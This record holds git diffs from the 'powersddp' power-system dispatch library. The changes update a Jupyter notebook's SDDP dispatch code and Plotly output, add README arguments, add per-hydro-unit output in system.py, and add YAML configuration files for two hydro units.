- " text-align: right;\n",
- " }\n",
- "</style>\n",
- "<table border=\"1\" class=\"dataframe\">\n",
- " <thead>\n",
- " <tr style=\"text-align: right;\">\n",
- " <th></th>\n",
- " <th>stage</th>\n",
- " <th>discretization</th>\n",
- " <th>v_i</th>\n",
- " <th>average_cost</th>\n",
- " </tr>\n",
- " </thead>\n",
- " <tbody>\n",
- " <tr>\n",
- " <th>0</th>\n",
- " <td>3</td>\n",
- " <td>0.0</td>\n",
- " <td>20.0</td>\n",
- " <td>6725.00</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>1</th>\n",
- " <td>3</td>\n",
- " <td>50.0</td>\n",
- " <td>60.0</td>\n",
- " <td>7.75</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>2</th>\n",
- " <td>3</td>\n",
- " <td>100.0</td>\n",
- " <td>100.0</td>\n",
- " <td>-0.00</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>3</th>\n",
- " <td>2</td>\n",
- " <td>0.0</td>\n",
- " <td>20.0</td>\n",
- " <td>11787.50</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>4</th>\n",
- " <td>2</td>\n",
- " <td>50.0</td>\n",
- " <td>60.0</td>\n",
- " <td>226.93</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>5</th>\n",
- " <td>2</td>\n",
- " <td>100.0</td>\n",
- " <td>100.0</td>\n",
- " <td>0.62</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>6</th>\n",
- " <td>1</td>\n",
- " <td>0.0</td>\n",
- " <td>20.0</td>\n",
- " <td>15425.00</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>7</th>\n",
- " <td>1</td>\n",
- " <td>50.0</td>\n",
- " <td>60.0</td>\n",
- " <td>576.31</td>\n",
- " </tr>\n",
- " <tr>\n",
- " <th>8</th>\n",
- " <td>1</td>\n",
- " <td>100.0</td>\n",
- " <td>100.0</td>\n",
- " <td>161.68</td>\n",
- " </tr>\n",
- " </tbody>\n",
- "</table>\n",
- "</div>"
- ],
- "text/plain": [
- " stage discretization v_i average_cost\n",
- "0 3 0.0 20.0 6725.00\n",
- "1 3 50.0 60.0 7.75\n",
- "2 3 100.0 100.0 -0.00\n",
- "3 2 0.0 20.0 11787.50\n",
- "4 2 50.0 60.0 226.93\n",
- "5 2 100.0 100.0 0.62\n",
- "6 1 0.0 20.0 15425.00\n",
- "7 1 50.0 60.0 576.31\n",
- "8 1 100.0 100.0 161.68"
- ]
- },
- "execution_count": 13,
- "metadata": {},
- "output_type": "execute_result"
- }
- ],
+ "outputs": [],
"source": [
"operation_df"
]
@@ -1510,7 +370,7 @@
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
- "version": "3.8.6"
+ "version": "3.7.9"
}
},
"nbformat": 4,
diff --git a/README.md b/README.md
index f2d7ecb..b3a32d4 100644
--- a/README.md
+++ b/README.md
@@ -74,12 +74,19 @@ print("System Load: {}\n"
#### **dispatch()** accepts the following arguments:
+- `solver : str, optional defaults to 'sdp'`
+ - Selects the solver option for the minimization objective function.
+
+- `scenario : int, optional defaults to 0`
+ - Chooses either a specific scenario to investigate (`scenario>1`) or all scenarios to evaluate (`scenario= 0`). Starting from 0 to the number of declared scenarios in the `hydro_units['inflow_scenarios']` parameter.
+
- `verbose : bool, optional defaults to False`
- Displays the PDDE solution for every stage of the execution. Use with care, solutions of complex systems with too many stages and scenarios might overflow the console.
- `plot : bool, optional, defaults to False`
- Displays a sequence of plots showing the future cost function for every stage of the execution.
+The following example executes the Power System dispatch using the Unique Linear Programming method for the first scenario (id = 1) and outputs the optimization steps.
```Python
import powersddp as psddp
@@ -100,7 +107,7 @@ data = {'load': [50, 50, 50],
{'name': 'GT2', 'capacity': 10, 'cost': 25}]}
PowerSystem = psddp.PowerSystem(data=data)
-operation = PowerSystem.dispatch()
+operation = PowerSystem.dispatch(solver='ulp', scenario=1, verbose=True)
print(operation)
```
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
index 38119d2..b25a00c 100644
--- a/powersddp/core/system.py
+++ b/powersddp/core/system.py
@@ -208,21 +208,25 @@ def dispatch(
)
coef_b -= v_i[i] * avg_water_marginal_cost[i]
- cuts.append(
- {
- "stage": stage,
- "coef_b": coef_b,
- "coefs": avg_water_marginal_cost,
- }
- )
- operation.append(
- {
- "stage": stage,
- "storage_percentage": "{}%".format(int(discretization[i])),
- "initial_volume": v_i[0],
- "average_cost": round(average, 2),
- }
- )
+ cuts.append(
+ {
+ "stage": stage,
+ "coef_b": coef_b,
+ "coefs": avg_water_marginal_cost,
+ }
+ )
+ operation.append(
+ {
+ "stage": stage,
+ "name": self.data["hydro_units"][i]["name"],
+ "storage_percentage": "{}%".format(
+ int(discretization[i])
+ ),
+ "initial_volume": v_i[i],
+ "average_cost": round(average, 2),
+ }
+ )
+ self.cuts = cuts
operation_df = pd.DataFrame(operation)
if n_hgu == 1 and plot:
@@ -244,13 +248,17 @@ def dispatch(
gu_operation=result["hydro_units"],
yaxis_column="vf",
yaxis_title="HGU Volume (hm3)",
- plot_title="HGU Stored Volume on Scenario {}".format(scn + 1),
+ plot_title="HGU Stored Volume on Scenario {}".format(
+ scn + 1
+ ),
)
plot_ulp(
gu_operation=result["thermal_units"],
yaxis_column="gt",
yaxis_title="Power Generation (MWmed)",
- plot_title="TGU Power Generation on Scenario {}".format(scn + 1),
+ plot_title="TGU Power Generation on Scenario {}".format(
+ scn + 1
+ ),
)
else:
result = ulp(
@@ -274,3 +282,5 @@ def dispatch(
scenario
),
)
+
+ return result
diff --git a/pyproject.toml b/pyproject.toml
index 20c24e8..a8e194a 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -2,7 +2,9 @@
name = "powersddp"
version = "0.0.2"
description = "A Stochastic Dual Dynamic Programmimg library to solve economical dispach of power systems."
-authors = ["Ettore Aquino <[email protected]>", "João Pedro Peters <[email protected]>"]
+authors = ["Ettore Aquino <[email protected]>",
+ "João Pedro Peters <[email protected]>",
+ "Pedro Henrique Peters <[email protected]>"]
repository = "https://github.com/ettoreaquino/powersddp.git"
diff --git a/system-2hgu-hydro.yml b/system-2hgu-hydro.yml
new file mode 100644
index 0000000..21c0075
--- /dev/null
+++ b/system-2hgu-hydro.yml
@@ -0,0 +1,22 @@
+-
+ name: HU1
+ v_max: 100
+ v_min: 20
+ v_ini: 100
+ prod: 0.95
+ flow_max: 60
+ inflow_scenarios:
+ - [23,16]
+ - [19,14]
+ - [15,11]
+-
+ name: HU2
+ v_max: 200
+ v_min: 40
+ v_ini: 200
+ prod: 0.85
+ flow_max: 100
+ inflow_scenarios:
+ - [46,32]
+ - [38,28]
+ - [30,22]
\ No newline at end of file
diff --git a/system-2hgu.yml b/system-2hgu.yml
new file mode 100644
index 0000000..e513d7c
--- /dev/null
+++ b/system-2hgu.yml
@@ -0,0 +1,7 @@
+load: [150,150,150]
+discretizations: 3
+stages: 3
+scenarios: 2
+outage_cost: 500
+hydro_units: !include system-2hgu-hydro.yml
+thermal_units: !include system-thermal.yml
\ No newline at end of file
| Multiple HGUs are now shown in the operation output
## Comments
> Closes #13
Multiple HGUs now working
| 2021-08-25T23:05:16 | 0.0 | [] | [] |
|||
ettoreaquino/powersddp | ettoreaquino__powersddp-7 | 6afd1a5889d000fa566e44d319d98fa82c24af76 | diff --git a/Notebook.ipynb b/Notebook.ipynb
index 18782e2..1eb6b54 100644
--- a/Notebook.ipynb
+++ b/Notebook.ipynb
@@ -2,27 +2,19 @@
"cells": [
{
"cell_type": "code",
- "execution_count": 1,
+ "execution_count": 2,
"id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
"metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System loaded from system.yml file\n"
- ]
- }
- ],
+ "outputs": [],
"source": [
- "from powersddp.system import PowerSystem\n",
- "import cvxopt.modeling as model\n",
+ "import powersddp as psddp\n",
"\n",
- "data = {'load': [50, 50, 50],\n",
+ "\n",
+ "data = {'load': [100, 15, 50],\n",
" 'discretizations': 3,\n",
" 'stages': 3,\n",
" 'scenarios': 2,\n",
- " 'shedding_cost': 500,\n",
+ " 'outage_cost': 500,\n",
" 'hydro-units': [{'name': 'HU1',\n",
" 'v_max': 100,\n",
" 'v_min': 20,\n",
@@ -32,7 +24,20 @@
" 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
" {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
"\n",
- "TestSystem = PowerSystem(path='system.yml')"
+ "TestSystem = psddp.PowerSystem(data=data)"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 6,
+ "id": "0b41801a-dc45-4777-a2ec-1294c91890cc",
+ "metadata": {
+ "scrolled": true,
+ "tags": []
+ },
+ "outputs": [],
+ "source": [
+ "operation = TestSystem.dispatch()"
]
},
{
@@ -66,7 +71,7 @@
" \\begin{aligned}\n",
" \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v\\\\\n",
" \\textrm{s.t.} \\quad & \\\\\n",
- " \\textrm{hydro balance} \\quad & v_f = v_i + afl - v_t \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) \\\\\n",
" \\textrm{load supplying} \\quad & \\rho\\cdot v_t + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
" \\textrm{constraints} \\quad & \\\\\n",
" & v_{f_{min}}\\leq v_f \\leq v_{f_{max}}\\\\\n",
@@ -83,15 +88,24 @@
},
{
"cell_type": "code",
- "execution_count": 4,
+ "execution_count": 16,
"id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
"metadata": {},
"outputs": [],
"source": [
- "def dispatch(system, v_i, inflow):\n",
+ "import cvxopt.modeling as model\n",
+ "from cvxopt import solvers\n",
+ "\n",
+ "import pandas as pd\n",
+ "import plotly.graph_objects as go\n",
+ "from plotly.subplots import make_subplots\n",
+ "\n",
+ "solvers.options['glpk'] = dict(msg_lev='GLP_MSG_OFF')\n",
+ "\n",
+ "def dispatch(system, v_i, inflow, cuts, stage, verbose:bool=False):\n",
" n_tgu = len(system.data['thermal-units'])\n",
" n_hgu = len(system.data['hydro-units'])\n",
- "\n",
+ " solvers.options['show_progress'] = verbose\n",
"\n",
" ## Initializing Model Variables\n",
" v_f = model.variable(n_hgu, \"Final Volume of the Hydro Unit\")\n",
@@ -99,6 +113,7 @@
" v_v = model.variable(n_hgu, \"Shed flow of the Hydro Unit\")\n",
" g_t = model.variable(n_tgu, \"Power generated by the Thermal Unit\")\n",
" deficit = model.variable(1, \"Power deficit\")\n",
+ " alpha = model.variable(1, \"Future Cost\")\n",
"\n",
" ## Objective Function\n",
" fob = 0\n",
@@ -107,14 +122,17 @@
" fob+=TestSystem.data['outage_cost']*deficit[0]\n",
" for i, _ in enumerate(system.data['hydro-units']):\n",
" fob += 0.01*v_v[i]\n",
+ " fob += 1.0 * alpha[0]\n",
"\n",
- " ## Hydro Balance\n",
+ " ## Constraints\n",
+ " \n",
+ " ### Hydro Balance\n",
" constraints = []\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
- " constraints.append( v_f[i] == v_i + inflow - v_t[i] - v_v[i] )\n",
+ " constraints.append( v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i] )\n",
"\n",
" supplying = 0\n",
- " ## Load Supplying\n",
+ " ### Load Supply\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" supplying += hgu[\"prod\"] * v_t[i]\n",
"\n",
@@ -123,9 +141,10 @@
"\n",
" supplying += deficit[0]\n",
"\n",
- " constraints.append(supplying == system.data['load'][2])\n",
+ " constraints.append(supplying == system.data['load'][stage-2])\n",
+ " \n",
"\n",
- " ## Constraints\n",
+ " ### Bounds\n",
" for i, hgu in enumerate(system.data['hydro-units']):\n",
" constraints.append(v_f[i] >= hgu[\"v_min\"])\n",
" constraints.append(v_f[i] <= hgu[\"v_max\"])\n",
@@ -138,152 +157,1341 @@
" constraints.append(g_t[i] <= tgu[\"capacity\"])\n",
"\n",
" constraints.append(deficit[0] >= 0)\n",
+ " constraints.append(alpha[0] >= 0)\n",
" \n",
+ " ### Cut constraint (Future cost function of forward stage)\n",
+ " for cut in cuts:\n",
+ " if cut['stage'] == stage:\n",
+ " equation = 0\n",
+ " for hgu in range(n_hgu):\n",
+ " equation += float(cut['coefs'][hgu])*v_f[hgu]\n",
+ " equation += float(cut['coef_b'])\n",
+ " constraints.append(alpha[0] >= equation)\n",
+ " \n",
+ " ## Solving\n",
" opt_problem = model.op(objective=fob, constraints=constraints)\n",
" opt_problem.solve(format='dense',solver='glpk')\n",
"\n",
- " print(\"Total Cost: {}\".format(fob.value()))\n",
+ " ## Print\n",
+ " if verbose:\n",
+ " print(\"Total Cost: {}\".format(fob.value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
- " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
"\n",
- " for i, tgu in enumerate(system.data['thermal-units']):\n",
- " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
"\n",
- " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
+ " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
"\n",
- " for i, hgu in enumerate(system.data['hydro-units']):\n",
- " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
"\n",
- " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))"
- ]
- },
- {
- "cell_type": "code",
- "execution_count": 5,
- "id": "17fb0a0c-5a87-41fb-a645-1434a65c02d4",
- "metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "Total Cost: [ 7.67e+03]\n",
- "\n",
- "Final Volume of the Hydro Unit 0 is [ 2.00e+01]\n",
- " hm3\n",
- "Turbined Flow of the Hydro Unit 0 is [ 1.10e+01]\n",
- " hm3\n",
- "Shed flow of the Hydro Unit 0 is [ 0.00e+00]\n",
- " hm3\n",
- "Power generated by the Thermal Unit 0 is [ 1.50e+01]\n",
- " MWmed\n",
- "Power generated by the Thermal Unit 1 is [ 1.00e+01]\n",
- " MWmed\n",
- "Power deficit is [ 1.45e+01]\n",
- " MWmed\n",
- "The cost of water at Hydro Unit 0 is [ 4.75e+02]\n",
- " hm3\n",
- "The Marginal Cost is: [-5.00e+02]\n",
- "\n",
- "GLPK Simplex Optimizer, v4.65\n",
- "12 rows, 6 columns, 17 non-zeros\n",
- " 0: obj = 0.000000000e+00 inf = 1.010e+02 (3)\n",
- " 5: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "* 6: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
- "OPTIMAL LP SOLUTION FOUND\n"
- ]
- }
- ],
- "source": [
- "system = TestSystem\n",
- "v_i = 20\n",
- "inflow = 11\n",
+ " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))\n",
+ " \n",
+ " return {\n",
+ " \"deficit\": deficit[0].value()[0],\n",
+ " \"operational_marginal_cost\": constraints[n_hgu].multiplier.value[0],\n",
+ " \"total_cost\": fob.value()[0],\n",
+ " \"future_cost\": alpha[0].value()[0],\n",
+ " \"hydro_units\": [{\n",
+ " \"v_f\": v_f[i].value()[0],\n",
+ " \"v_t\": v_t[i].value()[0],\n",
+ " \"v_v\": v_v[i].value()[0],\n",
+ " \"water_marginal_cost\": constraints[i].multiplier.value[0]} for i in range(n_hgu)],\n",
+ " \"thermal_units\": [{\"g_t\": g_t[i].value()[0]} for i in range(n_tgu)]\n",
+ " }\n",
+ "\n",
+ "def plot_future_cost_function(operation: pd.DataFrame):\n",
+ " \n",
+ " n_stages = len(operation['stage'].unique())\n",
+ " \n",
+ " fig = make_subplots(rows=n_stages, cols=1)\n",
+ "\n",
+ " i = 1\n",
+ " for stage in operation['stage'].unique():\n",
+ " stage_df = operation.loc[operation['stage'] == stage] \n",
+ " fig.add_trace(go.Scatter(x=stage_df[\"v_i\"],\n",
+ " y=stage_df['average_cost'],\n",
+ " mode='lines',\n",
+ " name=\"Stage {}\".format(i)), row=stage, col=1)\n",
+ " i+=1\n",
"\n",
- "dispatch(system=system, v_i=v_i, inflow=inflow)"
+ " fig.update_xaxes(title_text=\"Final Volume [hm3]\")\n",
+ " fig.update_yaxes(title_text=\"$/MW\")\n",
+ "\n",
+ " fig.update_layout(height=300*TestSystem.data['stages'], title_text=\"Future Cost Function\")\n",
+ " fig.show()"
]
},
{
"cell_type": "code",
- "execution_count": 9,
- "id": "108fdcb5-9ce2-49db-b487-eeaf90ec0e24",
- "metadata": {},
+ "execution_count": 17,
+ "id": "2b718ada-dd91-4cb6-a31c-f36b61674065",
+ "metadata": {
+ "tags": []
+ },
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+ "application/vnd.plotly.v1+json": {
+ "config": {
+ "plotlyServerURL": "https://plot.ly"
+ },
+ "data": [
+ {
+ "mode": "lines",
+ "name": "Stage 1",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x3",
+ "y": [
+ 6725,
+ 7.75,
+ 0
+ ],
+ "yaxis": "y3"
+ },
+ {
+ "mode": "lines",
+ "name": "Stage 2",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x2",
+ "y": [
+ 11787.5,
+ 226.93,
+ 0.62
+ ],
+ "yaxis": "y2"
+ },
+ {
+ "mode": "lines",
+ "name": "Stage 3",
+ "type": "scatter",
+ "x": [
+ 20,
+ 60,
+ 100
+ ],
+ "xaxis": "x",
+ "y": [
+ 15425,
+ 576.31,
+ 161.68
+ ],
+ "yaxis": "y"
+ }
+ ],
+ "layout": {
+ "autosize": true,
+ "template": {
+ "data": {
+ "bar": [
+ {
+ "error_x": {
+ "color": "#2a3f5f"
+ },
+ "error_y": {
+ "color": "#2a3f5f"
+ },
+ "marker": {
+ "line": {
+ "color": "#E5ECF6",
+ "width": 0.5
+ },
+ "pattern": {
+ "fillmode": "overlay",
+ "size": 10,
+ "solidity": 0.2
+ }
+ },
+ "type": "bar"
+ }
+ ],
+ "barpolar": [
+ {
+ "marker": {
+ "line": {
+ "color": "#E5ECF6",
+ "width": 0.5
+ },
+ "pattern": {
+ "fillmode": "overlay",
+ "size": 10,
+ "solidity": 0.2
+ }
+ },
+ "type": "barpolar"
+ }
+ ],
+ "carpet": [
+ {
+ "aaxis": {
+ "endlinecolor": "#2a3f5f",
+ "gridcolor": "white",
+ "linecolor": "white",
+ "minorgridcolor": "white",
+ "startlinecolor": "#2a3f5f"
+ },
+ "baxis": {
+ "endlinecolor": "#2a3f5f",
+ "gridcolor": "white",
+ "linecolor": "white",
+ "minorgridcolor": "white",
+ "startlinecolor": "#2a3f5f"
+ },
+ "type": "carpet"
+ }
+ ],
+ "choropleth": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "type": "choropleth"
+ }
+ ],
+ "contour": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "contour"
+ }
+ ],
+ "contourcarpet": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "type": "contourcarpet"
+ }
+ ],
+ "heatmap": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "heatmap"
+ }
+ ],
+ "heatmapgl": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "heatmapgl"
+ }
+ ],
+ "histogram": [
+ {
+ "marker": {
+ "pattern": {
+ "fillmode": "overlay",
+ "size": 10,
+ "solidity": 0.2
+ }
+ },
+ "type": "histogram"
+ }
+ ],
+ "histogram2d": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "histogram2d"
+ }
+ ],
+ "histogram2dcontour": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "histogram2dcontour"
+ }
+ ],
+ "mesh3d": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "type": "mesh3d"
+ }
+ ],
+ "parcoords": [
+ {
+ "line": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "parcoords"
+ }
+ ],
+ "pie": [
+ {
+ "automargin": true,
+ "type": "pie"
+ }
+ ],
+ "scatter": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatter"
+ }
+ ],
+ "scatter3d": [
+ {
+ "line": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatter3d"
+ }
+ ],
+ "scattercarpet": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattercarpet"
+ }
+ ],
+ "scattergeo": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattergeo"
+ }
+ ],
+ "scattergl": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattergl"
+ }
+ ],
+ "scattermapbox": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scattermapbox"
+ }
+ ],
+ "scatterpolar": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatterpolar"
+ }
+ ],
+ "scatterpolargl": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatterpolargl"
+ }
+ ],
+ "scatterternary": [
+ {
+ "marker": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "type": "scatterternary"
+ }
+ ],
+ "surface": [
+ {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ },
+ "colorscale": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "type": "surface"
+ }
+ ],
+ "table": [
+ {
+ "cells": {
+ "fill": {
+ "color": "#EBF0F8"
+ },
+ "line": {
+ "color": "white"
+ }
+ },
+ "header": {
+ "fill": {
+ "color": "#C8D4E3"
+ },
+ "line": {
+ "color": "white"
+ }
+ },
+ "type": "table"
+ }
+ ]
+ },
+ "layout": {
+ "annotationdefaults": {
+ "arrowcolor": "#2a3f5f",
+ "arrowhead": 0,
+ "arrowwidth": 1
+ },
+ "autotypenumbers": "strict",
+ "coloraxis": {
+ "colorbar": {
+ "outlinewidth": 0,
+ "ticks": ""
+ }
+ },
+ "colorscale": {
+ "diverging": [
+ [
+ 0,
+ "#8e0152"
+ ],
+ [
+ 0.1,
+ "#c51b7d"
+ ],
+ [
+ 0.2,
+ "#de77ae"
+ ],
+ [
+ 0.3,
+ "#f1b6da"
+ ],
+ [
+ 0.4,
+ "#fde0ef"
+ ],
+ [
+ 0.5,
+ "#f7f7f7"
+ ],
+ [
+ 0.6,
+ "#e6f5d0"
+ ],
+ [
+ 0.7,
+ "#b8e186"
+ ],
+ [
+ 0.8,
+ "#7fbc41"
+ ],
+ [
+ 0.9,
+ "#4d9221"
+ ],
+ [
+ 1,
+ "#276419"
+ ]
+ ],
+ "sequential": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ],
+ "sequentialminus": [
+ [
+ 0,
+ "#0d0887"
+ ],
+ [
+ 0.1111111111111111,
+ "#46039f"
+ ],
+ [
+ 0.2222222222222222,
+ "#7201a8"
+ ],
+ [
+ 0.3333333333333333,
+ "#9c179e"
+ ],
+ [
+ 0.4444444444444444,
+ "#bd3786"
+ ],
+ [
+ 0.5555555555555556,
+ "#d8576b"
+ ],
+ [
+ 0.6666666666666666,
+ "#ed7953"
+ ],
+ [
+ 0.7777777777777778,
+ "#fb9f3a"
+ ],
+ [
+ 0.8888888888888888,
+ "#fdca26"
+ ],
+ [
+ 1,
+ "#f0f921"
+ ]
+ ]
+ },
+ "colorway": [
+ "#636efa",
